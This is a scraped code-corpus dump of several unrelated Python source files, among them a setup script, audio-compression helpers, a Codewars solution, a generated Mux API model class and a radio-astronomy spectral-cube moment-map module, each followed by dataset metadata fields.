import setuptools setuptools.setup( name="allangdrive", version='0.1.0', url="https://github.com/allanlwu/allangdrive", author="<NAME>", description="Jupyter extension to allow user to sync files to Google Drive", packages=setuptools.find_packages(), install_requires=[ 'notebook', ], package_data={'allangdrive': ['static/*']}, )
none
1
1.680476
2
web_app/services/basilica_service.py
diegoarriola1/twitoff-pt5
0
6623592
<filename>web_app/services/basilica_service.py<gh_stars>0 # web_app/services/basilica_services.py import basilica import os from dotenv import load_dotenv load_dotenv() # parese the .env file for environment variables BASILICA_API_KEY = os.getenv("BASILICA_API_KEY") connection = basilica.Connection(BASILICA_API_KEY) print(type(connection)) if __name__ == "__main__": sentences = ["Hello world!", "How are you?"] embeddings = connection.embed_sentences(sentences) print(list(embeddings))
<filename>web_app/services/basilica_service.py<gh_stars>0 # web_app/services/basilica_services.py import basilica import os from dotenv import load_dotenv load_dotenv() # parese the .env file for environment variables BASILICA_API_KEY = os.getenv("BASILICA_API_KEY") connection = basilica.Connection(BASILICA_API_KEY) print(type(connection)) if __name__ == "__main__": sentences = ["Hello world!", "How are you?"] embeddings = connection.embed_sentences(sentences) print(list(embeddings))
en
0.677756
# web_app/services/basilica_services.py # parese the .env file for environment variables
2.20524
2
EDA/compress_audio/__init__.py
W210-Audio-Upscaling/Audio-Upscaling
0
6623593
from ffmpy import FFmpeg import os, glob class Normalize_Audio(): def __init__(self): ''' Constructor for this class. ''' pass def normalize(infile,bitrate): filename=os.path.splitext(os.path.split(infile)[1])[0] filepath=os.path.dirname(infile)+"\\normalized" try: os.mkdir(filepath) except OSError: pass ff = FFmpeg(inputs={infile: None},outputs={'%s\%s_normalized.mp3'%(filepath,filename): '-ac 1 -ab %s'%(bitrate)}) ff.run() return print("File Normalized") def compress(infile,bitrate): filename=os.path.splitext(os.path.split(infile)[1])[0] filepath=os.path.dirname(infile)+"\\compressed" try: os.mkdir(filepath) except OSError: pass ff = FFmpeg(inputs={infile: None},outputs={'%s\%s_compressed.mp3'%(filepath,filename): '-ac 1 -ab %s'%(bitrate)}) ff.run() return print("File Compressed")
from ffmpy import FFmpeg import os, glob class Normalize_Audio(): def __init__(self): ''' Constructor for this class. ''' pass def normalize(infile,bitrate): filename=os.path.splitext(os.path.split(infile)[1])[0] filepath=os.path.dirname(infile)+"\\normalized" try: os.mkdir(filepath) except OSError: pass ff = FFmpeg(inputs={infile: None},outputs={'%s\%s_normalized.mp3'%(filepath,filename): '-ac 1 -ab %s'%(bitrate)}) ff.run() return print("File Normalized") def compress(infile,bitrate): filename=os.path.splitext(os.path.split(infile)[1])[0] filepath=os.path.dirname(infile)+"\\compressed" try: os.mkdir(filepath) except OSError: pass ff = FFmpeg(inputs={infile: None},outputs={'%s\%s_compressed.mp3'%(filepath,filename): '-ac 1 -ab %s'%(bitrate)}) ff.run() return print("File Compressed")
en
0.727852
Constructor for this class.
2.988053
3
CodeWars/Unique_number.py
srisrinu1/Interview-solved
46
6623594
<filename>CodeWars/Unique_number.py ###This one is from a problem I soved on codewars in my beginner level #Qustion '''There is an array with some numbers. All numbers are equal except for one. Try to find it! find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2 find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55 It’s guaranteed that array contains at least 3 numbers. The tests contain some very huge arrays, so think about performance. ''' #Solution def find_uniq(arr): if arr[0] != arr[1]: if arr[0] != arr[2]: return arr[0] else: return arr[1] else: for i in arr[2:]: if i != arr[0]: return i
<filename>CodeWars/Unique_number.py ###This one is from a problem I soved on codewars in my beginner level #Qustion '''There is an array with some numbers. All numbers are equal except for one. Try to find it! find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2 find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55 It’s guaranteed that array contains at least 3 numbers. The tests contain some very huge arrays, so think about performance. ''' #Solution def find_uniq(arr): if arr[0] != arr[1]: if arr[0] != arr[2]: return arr[0] else: return arr[1] else: for i in arr[2:]: if i != arr[0]: return i
en
0.909465
###This one is from a problem I soved on codewars in my beginner level #Qustion There is an array with some numbers. All numbers are equal except for one. Try to find it! find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2 find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55 It’s guaranteed that array contains at least 3 numbers. The tests contain some very huge arrays, so think about performance. #Solution
3.962338
4
manage.py
zjmeow/HelloFlask
0
6623595
#coding:utf8 from flask_migrate import MigrateCommand , Migrate from app import create_app,db from flask_script import Manager app = create_app() manager = Manager(app) migrate = Migrate(app,db) manager.add_command('db',MigrateCommand) if __name__ == '__main__': app.run(host='0.0.0.0') # manager.run()
#coding:utf8 from flask_migrate import MigrateCommand , Migrate from app import create_app,db from flask_script import Manager app = create_app() manager = Manager(app) migrate = Migrate(app,db) manager.add_command('db',MigrateCommand) if __name__ == '__main__': app.run(host='0.0.0.0') # manager.run()
ru
0.232704
#coding:utf8 # manager.run()
1.887012
2
jinete/storers/sets.py
garciparedes/rider
5
6623596
<filename>jinete/storers/sets.py """The set of definitions to use more than one storer at the same time.""" from __future__ import ( annotations, ) import logging from typing import ( TYPE_CHECKING, ) from .abc import ( Storer, ) if TYPE_CHECKING: from typing import ( Set, Type, ) logger = logging.getLogger(__name__) class StorerSet(Storer): """Store a resulting solution trough multiple storers. This implementation is an intermediate tool to combine multiple storers. """ def __init__(self, storer_cls_set: Set[Type[Storer]], *args, **kwargs): """Construct a new object instance. :param storer_cls_set: The storer classes to be used to store the problem solution. :param args: Additional positional arguments. :param kwargs: Additional named arguments. """ super().__init__(*args, **kwargs) self.storer_cls_set = storer_cls_set self.args = args self.kwargs = kwargs def store(self) -> None: """Perform a storage process.""" for storer_cls in self.storer_cls_set: name = getattr(storer_cls, "__name__", None) logger.info(f'Storing result with "{name}"...') storer = storer_cls(*self.args, **self.kwargs) storer.store()
<filename>jinete/storers/sets.py """The set of definitions to use more than one storer at the same time.""" from __future__ import ( annotations, ) import logging from typing import ( TYPE_CHECKING, ) from .abc import ( Storer, ) if TYPE_CHECKING: from typing import ( Set, Type, ) logger = logging.getLogger(__name__) class StorerSet(Storer): """Store a resulting solution trough multiple storers. This implementation is an intermediate tool to combine multiple storers. """ def __init__(self, storer_cls_set: Set[Type[Storer]], *args, **kwargs): """Construct a new object instance. :param storer_cls_set: The storer classes to be used to store the problem solution. :param args: Additional positional arguments. :param kwargs: Additional named arguments. """ super().__init__(*args, **kwargs) self.storer_cls_set = storer_cls_set self.args = args self.kwargs = kwargs def store(self) -> None: """Perform a storage process.""" for storer_cls in self.storer_cls_set: name = getattr(storer_cls, "__name__", None) logger.info(f'Storing result with "{name}"...') storer = storer_cls(*self.args, **self.kwargs) storer.store()
en
0.83209
The set of definitions to use more than one storer at the same time. Store a resulting solution trough multiple storers. This implementation is an intermediate tool to combine multiple storers. Construct a new object instance. :param storer_cls_set: The storer classes to be used to store the problem solution. :param args: Additional positional arguments. :param kwargs: Additional named arguments. Perform a storage process.
2.950994
3
mux_python/models/referrer_domain_restriction.py
ryan-alley/mux-python
0
6623597
# coding: utf-8 """ Mux API Mux is how developers build online video. This API encompasses both Mux Video and Mux Data functionality to help you build your video-related projects better and faster than ever before. # noqa: E501 The version of the OpenAPI document: v1 Contact: <EMAIL> Generated by: https://openapi-generator.tech """ import inspect import pprint import re # noqa: F401 import six from mux_python.configuration import Configuration class ReferrerDomainRestriction(object): """NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. """ """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ openapi_types = { 'allowed_domains': 'list[str]', 'allow_no_referrer': 'bool' } attribute_map = { 'allowed_domains': 'allowed_domains', 'allow_no_referrer': 'allow_no_referrer' } def __init__(self, allowed_domains=None, allow_no_referrer=False, local_vars_configuration=None): # noqa: E501 """ReferrerDomainRestriction - a model defined in OpenAPI""" # noqa: E501 if local_vars_configuration is None: local_vars_configuration = Configuration.get_default_copy() self.local_vars_configuration = local_vars_configuration self._allowed_domains = None self._allow_no_referrer = None self.discriminator = None if allowed_domains is not None: self.allowed_domains = allowed_domains if allow_no_referrer is not None: self.allow_no_referrer = allow_no_referrer @property def allowed_domains(self): """Gets the allowed_domains of this ReferrerDomainRestriction. # noqa: E501 List of domains allowed to play videos. 
Possible values are * `[]` Empty Array indicates deny video playback requests for all domains * `[\"*\"]` A Single Wildcard `*` entry means allow video playback requests from any domain * `[\"*.example.com\", \"foo.com\"]` A list of up to 10 domains or valid dns-style wildcards # noqa: E501 :return: The allowed_domains of this ReferrerDomainRestriction. # noqa: E501 :rtype: list[str] """ return self._allowed_domains @allowed_domains.setter def allowed_domains(self, allowed_domains): """Sets the allowed_domains of this ReferrerDomainRestriction. List of domains allowed to play videos. Possible values are * `[]` Empty Array indicates deny video playback requests for all domains * `[\"*\"]` A Single Wildcard `*` entry means allow video playback requests from any domain * `[\"*.example.com\", \"foo.com\"]` A list of up to 10 domains or valid dns-style wildcards # noqa: E501 :param allowed_domains: The allowed_domains of this ReferrerDomainRestriction. # noqa: E501 :type allowed_domains: list[str] """ self._allowed_domains = allowed_domains @property def allow_no_referrer(self): """Gets the allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 A boolean to determine whether to allow or deny HTTP requests without `Referer` HTTP request header. Playback requests coming from non-web/native applications like iOS, Android or smart TVs will not have a `Referer` HTTP header. Set this value to `true` to allow these playback requests. # noqa: E501 :return: The allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 :rtype: bool """ return self._allow_no_referrer @allow_no_referrer.setter def allow_no_referrer(self, allow_no_referrer): """Sets the allow_no_referrer of this ReferrerDomainRestriction. A boolean to determine whether to allow or deny HTTP requests without `Referer` HTTP request header. Playback requests coming from non-web/native applications like iOS, Android or smart TVs will not have a `Referer` HTTP header. 
Set this value to `true` to allow these playback requests. # noqa: E501 :param allow_no_referrer: The allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 :type allow_no_referrer: bool """ self._allow_no_referrer = allow_no_referrer def to_dict(self, serialize=False): """Returns the model properties as a dict""" result = {} def convert(x): if hasattr(x, "to_dict"): args = inspect.getargspec(x.to_dict).args if len(args) == 1: return x.to_dict() else: return x.to_dict(serialize) else: return x for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) attr = self.attribute_map.get(attr, attr) if serialize else attr if isinstance(value, list): result[attr] = list(map( lambda x: convert(x), value )) elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], convert(item[1])), value.items() )) else: result[attr] = convert(value) return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, ReferrerDomainRestriction): return False return self.to_dict() == other.to_dict() def __ne__(self, other): """Returns true if both objects are not equal""" if not isinstance(other, ReferrerDomainRestriction): return True return self.to_dict() != other.to_dict()
# coding: utf-8 """ Mux API Mux is how developers build online video. This API encompasses both Mux Video and Mux Data functionality to help you build your video-related projects better and faster than ever before. # noqa: E501 The version of the OpenAPI document: v1 Contact: <EMAIL> Generated by: https://openapi-generator.tech """ import inspect import pprint import re # noqa: F401 import six from mux_python.configuration import Configuration class ReferrerDomainRestriction(object): """NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. """ """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ openapi_types = { 'allowed_domains': 'list[str]', 'allow_no_referrer': 'bool' } attribute_map = { 'allowed_domains': 'allowed_domains', 'allow_no_referrer': 'allow_no_referrer' } def __init__(self, allowed_domains=None, allow_no_referrer=False, local_vars_configuration=None): # noqa: E501 """ReferrerDomainRestriction - a model defined in OpenAPI""" # noqa: E501 if local_vars_configuration is None: local_vars_configuration = Configuration.get_default_copy() self.local_vars_configuration = local_vars_configuration self._allowed_domains = None self._allow_no_referrer = None self.discriminator = None if allowed_domains is not None: self.allowed_domains = allowed_domains if allow_no_referrer is not None: self.allow_no_referrer = allow_no_referrer @property def allowed_domains(self): """Gets the allowed_domains of this ReferrerDomainRestriction. # noqa: E501 List of domains allowed to play videos. 
Possible values are * `[]` Empty Array indicates deny video playback requests for all domains * `[\"*\"]` A Single Wildcard `*` entry means allow video playback requests from any domain * `[\"*.example.com\", \"foo.com\"]` A list of up to 10 domains or valid dns-style wildcards # noqa: E501 :return: The allowed_domains of this ReferrerDomainRestriction. # noqa: E501 :rtype: list[str] """ return self._allowed_domains @allowed_domains.setter def allowed_domains(self, allowed_domains): """Sets the allowed_domains of this ReferrerDomainRestriction. List of domains allowed to play videos. Possible values are * `[]` Empty Array indicates deny video playback requests for all domains * `[\"*\"]` A Single Wildcard `*` entry means allow video playback requests from any domain * `[\"*.example.com\", \"foo.com\"]` A list of up to 10 domains or valid dns-style wildcards # noqa: E501 :param allowed_domains: The allowed_domains of this ReferrerDomainRestriction. # noqa: E501 :type allowed_domains: list[str] """ self._allowed_domains = allowed_domains @property def allow_no_referrer(self): """Gets the allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 A boolean to determine whether to allow or deny HTTP requests without `Referer` HTTP request header. Playback requests coming from non-web/native applications like iOS, Android or smart TVs will not have a `Referer` HTTP header. Set this value to `true` to allow these playback requests. # noqa: E501 :return: The allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 :rtype: bool """ return self._allow_no_referrer @allow_no_referrer.setter def allow_no_referrer(self, allow_no_referrer): """Sets the allow_no_referrer of this ReferrerDomainRestriction. A boolean to determine whether to allow or deny HTTP requests without `Referer` HTTP request header. Playback requests coming from non-web/native applications like iOS, Android or smart TVs will not have a `Referer` HTTP header. 
Set this value to `true` to allow these playback requests. # noqa: E501 :param allow_no_referrer: The allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 :type allow_no_referrer: bool """ self._allow_no_referrer = allow_no_referrer def to_dict(self, serialize=False): """Returns the model properties as a dict""" result = {} def convert(x): if hasattr(x, "to_dict"): args = inspect.getargspec(x.to_dict).args if len(args) == 1: return x.to_dict() else: return x.to_dict(serialize) else: return x for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) attr = self.attribute_map.get(attr, attr) if serialize else attr if isinstance(value, list): result[attr] = list(map( lambda x: convert(x), value )) elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], convert(item[1])), value.items() )) else: result[attr] = convert(value) return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, ReferrerDomainRestriction): return False return self.to_dict() == other.to_dict() def __ne__(self, other): """Returns true if both objects are not equal""" if not isinstance(other, ReferrerDomainRestriction): return True return self.to_dict() != other.to_dict()
en
0.652085
# coding: utf-8 Mux API Mux is how developers build online video. This API encompasses both Mux Video and Mux Data functionality to help you build your video-related projects better and faster than ever before. # noqa: E501 The version of the OpenAPI document: v1 Contact: <EMAIL> Generated by: https://openapi-generator.tech # noqa: F401 NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. # noqa: E501 ReferrerDomainRestriction - a model defined in OpenAPI # noqa: E501 Gets the allowed_domains of this ReferrerDomainRestriction. # noqa: E501 List of domains allowed to play videos. Possible values are * `[]` Empty Array indicates deny video playback requests for all domains * `[\"*\"]` A Single Wildcard `*` entry means allow video playback requests from any domain * `[\"*.example.com\", \"foo.com\"]` A list of up to 10 domains or valid dns-style wildcards # noqa: E501 :return: The allowed_domains of this ReferrerDomainRestriction. # noqa: E501 :rtype: list[str] Sets the allowed_domains of this ReferrerDomainRestriction. List of domains allowed to play videos. Possible values are * `[]` Empty Array indicates deny video playback requests for all domains * `[\"*\"]` A Single Wildcard `*` entry means allow video playback requests from any domain * `[\"*.example.com\", \"foo.com\"]` A list of up to 10 domains or valid dns-style wildcards # noqa: E501 :param allowed_domains: The allowed_domains of this ReferrerDomainRestriction. # noqa: E501 :type allowed_domains: list[str] Gets the allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 A boolean to determine whether to allow or deny HTTP requests without `Referer` HTTP request header. 
Playback requests coming from non-web/native applications like iOS, Android or smart TVs will not have a `Referer` HTTP header. Set this value to `true` to allow these playback requests. # noqa: E501 :return: The allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 :rtype: bool Sets the allow_no_referrer of this ReferrerDomainRestriction. A boolean to determine whether to allow or deny HTTP requests without `Referer` HTTP request header. Playback requests coming from non-web/native applications like iOS, Android or smart TVs will not have a `Referer` HTTP header. Set this value to `true` to allow these playback requests. # noqa: E501 :param allow_no_referrer: The allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 :type allow_no_referrer: bool Returns the model properties as a dict Returns the string representation of the model For `print` and `pprint` Returns true if both objects are equal Returns true if both objects are not equal
2.004935
2
main.py
thanapolbig/python_API
0
6623598
<gh_stars>0 from typing import Optional import sqlite3 from fastapi import FastAPI app = FastAPI() print("go to swagger =>> http://1172.16.31.10:8000/docs") @app.get("/") def read_root(): return {"Hello": "World"} @app.get("/items/{item_id}") def read_item(item_id: int, q: Optional[str] = None): return {"item_id": item_id, "q": q} @app.get("/getdata")
from typing import Optional import sqlite3 from fastapi import FastAPI app = FastAPI() print("go to swagger =>> http://1172.16.31.10:8000/docs") @app.get("/") def read_root(): return {"Hello": "World"} @app.get("/items/{item_id}") def read_item(item_id: int, q: Optional[str] = None): return {"item_id": item_id, "q": q} @app.get("/getdata")
none
1
2.665626
3
cube_analysis/moments.py
e-koch/CubeAnalysis
4
6623599
<reponame>e-koch/CubeAnalysis<filename>cube_analysis/moments.py from spectral_cube import SpectralCube from spectral_cube.lower_dimensional_structures import Projection import numpy as np import astropy.units as u from astropy.io import fits from astropy.wcs import WCS from astropy import log from astropy.convolution import Gaussian1DKernel from astropy.utils.console import ProgressBar import os import glob from .feather_cubes import get_channel_chunks from .progressbar import _map_context def _peak_velocity(args): ''' Return the velocity at the peak of a spectrum. ''' spec, kern = args if kern is None: return spec.spectral_axis[np.argmax(spec.value)] else: smooth_spec = spec.spectral_smooth(kern) argmax = np.argmax(smooth_spec.value) return spec.spectral_axis[argmax] def find_peakvelocity(cube_name, mask_name=None, source_mask=None, chunk_size=1e4, smooth_size=None, # in_memory=False, num_cores=1, spectral_slice=slice(None), verbose=False): ''' Calculate the peak velocity surface of a spectral cube ''' # Open the cube to get some properties for the peak velocity # array cube_hdu = fits.open(cube_name, mode='denywrite') shape = cube_hdu[0].shape spat_wcs = WCS(cube_hdu[0].header).celestial vel_unit = u.Unit(cube_hdu[0].header['CUNIT3']) cube_hdu.close() del cube_hdu peakvels = Projection(np.zeros(shape[1:]) * np.NaN, wcs=spat_wcs, unit=vel_unit) # Now read in the source mask if mask_name is not None or source_mask is not None: if source_mask is None: source_mask = fits.getdata(mask_name) source_mask_spatial = source_mask.sum(0) > 0 posns = np.where(source_mask_spatial) else: posns = np.indices(shape[1:]) chunk_size = int(chunk_size) chunk_idx = get_channel_chunks(posns[0].size, chunk_size) if smooth_size is not None: kern = Gaussian1DKernel(smooth_size) else: kern = None for i, chunk in enumerate(chunk_idx): log.info("On chunk {0} of {1}".format(i + 1, len(chunk_idx))) y_posn = posns[0][chunk] x_posn = posns[1][chunk] if verbose: pbar = ProgressBar(y_posn.size) 
cube = SpectralCube.read(cube_name) if mask_name is not None: cube = cube.with_mask(source_mask) cube = cube[spectral_slice] for j, (y, x) in enumerate(zip(y_posn, x_posn)): peakvels[y, x] = _peak_velocity((cube[:, y, x], kern)) if verbose: pbar.update(j + 1) del cube # if in_memory: # gener = [(cube[:, y, x], kern) # for y, x in zip(y_posn, x_posn)] # else: # gener = ((cube[:, y, x], kern) # for y, x in zip(y_posn, x_posn)) # with _map_context(num_cores, verbose=verbose) as map: # output = map(_peak_velocity, gener) # del gener # for out, y, x in zip(output, y_posn, x_posn): # peakvels[y, x] = out # peakvels[peakvels == 0.0 * u.m / u.s] = np.NaN * u.m / u.s # Make sure there are no garbage points outside of the cube spectral range cube = SpectralCube.read(cube_name)[spectral_slice] peakvels[peakvels < cube.spectral_extrema[0]] = np.NaN * u.m / u.s peakvels[peakvels > cube.spectral_extrema[1]] = np.NaN * u.m / u.s del cube return peakvels def find_peakvelocity_cube(cube, smooth_size=None, pb_mask=None, num_cores=1, verbose=False, how='cube', spectral_slice=slice(None)): ''' Make peak velocity map with cube operations. ''' if smooth_size is not None: kern = Gaussian1DKernel(smooth_size) parallel = True if num_cores > 1 else False smooth_cube = cube.spectral_smooth(kern, parallel=parallel, num_cores=num_cores) else: smooth_cube = cube argmax_plane = smooth_cube[spectral_slice].argmax(axis=0, how=how) peakvels = cube[spectral_slice].spectral_axis[argmax_plane] if pb_mask is not None: peakvels[~pb_mask] = np.NaN return peakvels def make_moments(cube_name, mask_name, output_folder, freq=None, custom_mask_name=None, num_cores=1, verbose=False, chunk_size=1e4, in_memory=False, smooth_size=None, how='slice', make_peakvels=True, spectral_slice=slice(None)): ''' Create the moment arrays. 
''' cube = SpectralCube.read(cube_name) # Load in source mask source_mask = fits.getdata(mask_name) source_mask = source_mask.astype(np.bool) # Allow loading in a custom mask to combine with the signal mask # For cases like M31 where the MW emission needs to be manually flagged if custom_mask_name is not None: custom_mask = fits.getdata(custom_mask_name) custom_mask = custom_mask.astype(np.bool) source_mask = np.logical_and(source_mask, custom_mask) cube = cube.with_mask(source_mask) # Now create the moment 1 and save it. Make a linewidth one too. cube_base_name = os.path.split(cube_name)[-1] log.info(f"Making moment 0 from cube {cube_base_name}") moment0 = cube[spectral_slice].moment0(how=how) moment0_name = "{}.mom0.fits".format(cube_base_name.rstrip(".fits")) moment0.write(os.path.join(output_folder, moment0_name), overwrite=True) log.info(f"Making moment 1 from cube {cube_base_name}") moment1 = cube[spectral_slice].moment1(how=how).astype(np.float32) moment1[moment1 < cube.spectral_extrema[0]] = np.NaN * u.m / u.s moment1[moment1 > cube.spectral_extrema[1]] = np.NaN * u.m / u.s moment1_name = "{}.mom1.fits".format(cube_base_name.rstrip(".fits")) moment1.header["BITPIX"] = -32 moment1.write(os.path.join(output_folder, moment1_name), overwrite=True) log.info(f"Making line width from cube {cube_base_name}") linewidth = cube[spectral_slice].linewidth_sigma(how=how) lwidth_name = "{}.lwidth.fits".format(cube_base_name.rstrip(".fits")) linewidth.write(os.path.join(output_folder, lwidth_name), overwrite=True) # Skewness log.info(f"Making skewness from cube {cube_base_name}") mom3 = cube[spectral_slice].moment(order=3, axis=0, how=how) # Normalize third moment by the linewidth to get the skewness skew = mom3 / linewidth ** 3 skew_name = "{}.skewness.fits".format(cube_base_name.rstrip(".fits")) skew.write(os.path.join(output_folder, skew_name), overwrite=True) # Kurtosis: Uncorrected log.info(f"Making kurtosis from cube {cube_base_name}") mom4 = 
cube[spectral_slice].moment(order=4, axis=0, how=how) # Normalize third moment by the linewidth to get the skewness # And subtract 3 to correct for Gaussian kurtosis of 3. kurt = (mom4 / linewidth ** 4) - 3 kurt_name = "{}.kurtosis.fits".format(cube_base_name.rstrip(".fits")) kurt.write(os.path.join(output_folder, kurt_name), overwrite=True) # Peak temperature map. And convert to K if in_memory: cube.allow_huge_operations = True log.info(f"Making peak temperature from cube {cube_base_name}") maxima = cube[spectral_slice].max(axis=0, how=how) if freq is not None: if not cube.unit.is_equivalent(u.K): if hasattr(cube, 'beams'): peak_temps = maxima * cube.beams.largest_beam().jtok(freq) elif hasattr(cube, 'beam'): peak_temps = maxima * cube.beam.jtok(freq) else: log.info("No beam object found. Cannot convert to K.") else: peak_temps = maxima peaktemps_name = "{}.peaktemps.fits".format(cube_base_name.rstrip(".fits")) peak_temps.write(os.path.join(output_folder, peaktemps_name), overwrite=True) log.info(f"Making peak velocity from cube {cube_base_name}") if make_peakvels: if in_memory: peakvels = find_peakvelocity_cube(cube[spectral_slice], smooth_size=smooth_size, how=how, num_cores=num_cores, spectral_slice=spectral_slice) else: peakvels = find_peakvelocity(cube_name, mask_name, source_mask=source_mask, chunk_size=chunk_size, smooth_size=smooth_size, spectral_slice=spectral_slice, verbose=verbose) peakvels = peakvels.astype(np.float32) peakvels.header["BITPIX"] = -32 peakvels_name = \ "{}.peakvels.fits".format(cube_base_name.rstrip(".fits")) peakvels.write(os.path.join(output_folder, peakvels_name), overwrite=True) def find_moment_names(path): ''' Given a path, make global variables of the moment names. 
''' search_dict = {"Moment0": "mom0", "Moment1": "mom1", "LWidth": "lwidth", "Skewness": "skewness", "Kurtosis": "kurtosis", "PeakTemp": "peaktemps", "PeakVels": "peakvels"} found_dict = {} for filename in glob.glob(os.path.join(path, "*.fits")): for key in search_dict: if search_dict[key] in filename: found_dict[key] = filename search_dict.pop(key) break return found_dict
from spectral_cube import SpectralCube from spectral_cube.lower_dimensional_structures import Projection import numpy as np import astropy.units as u from astropy.io import fits from astropy.wcs import WCS from astropy import log from astropy.convolution import Gaussian1DKernel from astropy.utils.console import ProgressBar import os import glob from .feather_cubes import get_channel_chunks from .progressbar import _map_context def _peak_velocity(args): ''' Return the velocity at the peak of a spectrum. ''' spec, kern = args if kern is None: return spec.spectral_axis[np.argmax(spec.value)] else: smooth_spec = spec.spectral_smooth(kern) argmax = np.argmax(smooth_spec.value) return spec.spectral_axis[argmax] def find_peakvelocity(cube_name, mask_name=None, source_mask=None, chunk_size=1e4, smooth_size=None, # in_memory=False, num_cores=1, spectral_slice=slice(None), verbose=False): ''' Calculate the peak velocity surface of a spectral cube ''' # Open the cube to get some properties for the peak velocity # array cube_hdu = fits.open(cube_name, mode='denywrite') shape = cube_hdu[0].shape spat_wcs = WCS(cube_hdu[0].header).celestial vel_unit = u.Unit(cube_hdu[0].header['CUNIT3']) cube_hdu.close() del cube_hdu peakvels = Projection(np.zeros(shape[1:]) * np.NaN, wcs=spat_wcs, unit=vel_unit) # Now read in the source mask if mask_name is not None or source_mask is not None: if source_mask is None: source_mask = fits.getdata(mask_name) source_mask_spatial = source_mask.sum(0) > 0 posns = np.where(source_mask_spatial) else: posns = np.indices(shape[1:]) chunk_size = int(chunk_size) chunk_idx = get_channel_chunks(posns[0].size, chunk_size) if smooth_size is not None: kern = Gaussian1DKernel(smooth_size) else: kern = None for i, chunk in enumerate(chunk_idx): log.info("On chunk {0} of {1}".format(i + 1, len(chunk_idx))) y_posn = posns[0][chunk] x_posn = posns[1][chunk] if verbose: pbar = ProgressBar(y_posn.size) cube = SpectralCube.read(cube_name) if mask_name is not None: cube 
= cube.with_mask(source_mask) cube = cube[spectral_slice] for j, (y, x) in enumerate(zip(y_posn, x_posn)): peakvels[y, x] = _peak_velocity((cube[:, y, x], kern)) if verbose: pbar.update(j + 1) del cube # if in_memory: # gener = [(cube[:, y, x], kern) # for y, x in zip(y_posn, x_posn)] # else: # gener = ((cube[:, y, x], kern) # for y, x in zip(y_posn, x_posn)) # with _map_context(num_cores, verbose=verbose) as map: # output = map(_peak_velocity, gener) # del gener # for out, y, x in zip(output, y_posn, x_posn): # peakvels[y, x] = out # peakvels[peakvels == 0.0 * u.m / u.s] = np.NaN * u.m / u.s # Make sure there are no garbage points outside of the cube spectral range cube = SpectralCube.read(cube_name)[spectral_slice] peakvels[peakvels < cube.spectral_extrema[0]] = np.NaN * u.m / u.s peakvels[peakvels > cube.spectral_extrema[1]] = np.NaN * u.m / u.s del cube return peakvels def find_peakvelocity_cube(cube, smooth_size=None, pb_mask=None, num_cores=1, verbose=False, how='cube', spectral_slice=slice(None)): ''' Make peak velocity map with cube operations. ''' if smooth_size is not None: kern = Gaussian1DKernel(smooth_size) parallel = True if num_cores > 1 else False smooth_cube = cube.spectral_smooth(kern, parallel=parallel, num_cores=num_cores) else: smooth_cube = cube argmax_plane = smooth_cube[spectral_slice].argmax(axis=0, how=how) peakvels = cube[spectral_slice].spectral_axis[argmax_plane] if pb_mask is not None: peakvels[~pb_mask] = np.NaN return peakvels def make_moments(cube_name, mask_name, output_folder, freq=None, custom_mask_name=None, num_cores=1, verbose=False, chunk_size=1e4, in_memory=False, smooth_size=None, how='slice', make_peakvels=True, spectral_slice=slice(None)): ''' Create the moment arrays. 
''' cube = SpectralCube.read(cube_name) # Load in source mask source_mask = fits.getdata(mask_name) source_mask = source_mask.astype(np.bool) # Allow loading in a custom mask to combine with the signal mask # For cases like M31 where the MW emission needs to be manually flagged if custom_mask_name is not None: custom_mask = fits.getdata(custom_mask_name) custom_mask = custom_mask.astype(np.bool) source_mask = np.logical_and(source_mask, custom_mask) cube = cube.with_mask(source_mask) # Now create the moment 1 and save it. Make a linewidth one too. cube_base_name = os.path.split(cube_name)[-1] log.info(f"Making moment 0 from cube {cube_base_name}") moment0 = cube[spectral_slice].moment0(how=how) moment0_name = "{}.mom0.fits".format(cube_base_name.rstrip(".fits")) moment0.write(os.path.join(output_folder, moment0_name), overwrite=True) log.info(f"Making moment 1 from cube {cube_base_name}") moment1 = cube[spectral_slice].moment1(how=how).astype(np.float32) moment1[moment1 < cube.spectral_extrema[0]] = np.NaN * u.m / u.s moment1[moment1 > cube.spectral_extrema[1]] = np.NaN * u.m / u.s moment1_name = "{}.mom1.fits".format(cube_base_name.rstrip(".fits")) moment1.header["BITPIX"] = -32 moment1.write(os.path.join(output_folder, moment1_name), overwrite=True) log.info(f"Making line width from cube {cube_base_name}") linewidth = cube[spectral_slice].linewidth_sigma(how=how) lwidth_name = "{}.lwidth.fits".format(cube_base_name.rstrip(".fits")) linewidth.write(os.path.join(output_folder, lwidth_name), overwrite=True) # Skewness log.info(f"Making skewness from cube {cube_base_name}") mom3 = cube[spectral_slice].moment(order=3, axis=0, 